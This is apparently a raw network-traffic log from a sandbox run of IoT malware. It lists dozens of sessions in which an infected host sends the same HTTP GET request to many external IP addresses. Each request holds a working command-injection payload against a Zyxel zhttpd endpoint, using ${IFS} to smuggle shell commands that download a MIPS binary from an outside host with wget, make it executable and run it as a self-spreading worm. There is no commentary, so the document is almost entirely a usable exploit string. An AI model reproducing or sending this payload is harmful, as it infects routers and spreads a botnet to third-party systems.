                                            Feb 2, 2024 06:20:23.151808977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22192.168.2.1532852168.6.122.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151825905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23192.168.2.1549340134.165.59.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151865005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24192.168.2.1544820210.39.103.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151880026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25192.168.2.153601465.43.66.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151901960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26192.168.2.1547360184.156.52.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151926994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27192.168.2.155118092.113.192.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151952982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28192.168.2.1558542161.253.142.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151976109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29192.168.2.1558752112.171.181.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151992083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            30192.168.2.1560118113.233.33.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152014971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            31192.168.2.1542662109.71.145.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152036905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            32192.168.2.1556748121.219.71.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152081966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            33192.168.2.154601875.22.134.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152086020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            34192.168.2.154476265.197.130.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152105093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            35192.168.2.1541814146.229.52.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152134895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            36192.168.2.1551390190.169.220.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152167082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            37192.168.2.1533634177.45.153.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152188063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            38192.168.2.1547432211.172.98.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152204990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            39192.168.2.1553656216.15.239.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152225971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            40192.168.2.155508684.204.196.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152266026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            41192.168.2.1543410174.20.117.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152266979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            42192.168.2.153677235.160.97.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152297020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            43192.168.2.1546020119.80.100.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152328014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            44192.168.2.1546618186.203.128.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152350903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            45192.168.2.1544166116.151.245.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152453899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            46192.168.2.153327254.46.155.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152477026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            47192.168.2.1534922217.196.24.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152506113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            48192.168.2.1533238131.56.213.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152534962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            49192.168.2.1542212168.81.91.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152549028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            50192.168.2.1553572175.116.73.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152594090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            51192.168.2.1545212124.189.247.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152615070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            52192.168.2.1552708208.158.87.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152641058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            53192.168.2.153330245.114.212.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152651072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            54192.168.2.1550504220.246.92.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152693033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            55192.168.2.1539232176.164.174.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152705908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            56192.168.2.1542124114.38.45.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152731895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            57192.168.2.155699436.111.203.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152774096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            58192.168.2.1542524132.30.62.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152796030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            59192.168.2.1558252162.122.157.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152837038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            60192.168.2.1535446175.73.233.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152851105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            61192.168.2.1549692189.130.225.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152877092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            62192.168.2.154664245.31.236.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152901888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            63192.168.2.1545378211.111.2.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152930021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            64192.168.2.1533972169.152.29.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152946949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            65192.168.2.155797223.108.108.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.152972937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            66192.168.2.154483481.153.129.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153002024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            67192.168.2.1535480136.226.248.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153029919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            68192.168.2.15369049.102.125.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153048992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            69192.168.2.1548302170.249.78.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153155088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            70192.168.2.1554620107.46.68.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153181076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            71192.168.2.1556922104.16.150.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153201103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            72192.168.2.154116684.179.181.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153239965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            73192.168.2.153770853.36.246.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153255939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            74192.168.2.1558646140.63.237.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153285027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            75192.168.2.1550952116.113.139.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153321981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            76192.168.2.1539284218.10.30.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153330088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            77192.168.2.1555166221.128.213.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153357029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            78192.168.2.155894464.23.171.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153417110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            79192.168.2.1549816129.112.101.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153501034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            80192.168.2.1553014167.107.184.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153525114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            81192.168.2.1541818170.160.27.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153561115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            82192.168.2.155293685.71.213.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153577089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            83192.168.2.1534624124.72.156.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153604031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            84192.168.2.1560230176.155.5.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153624058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            85192.168.2.1552682202.79.208.194443
                                            TimestampBytes transferredDirectionData
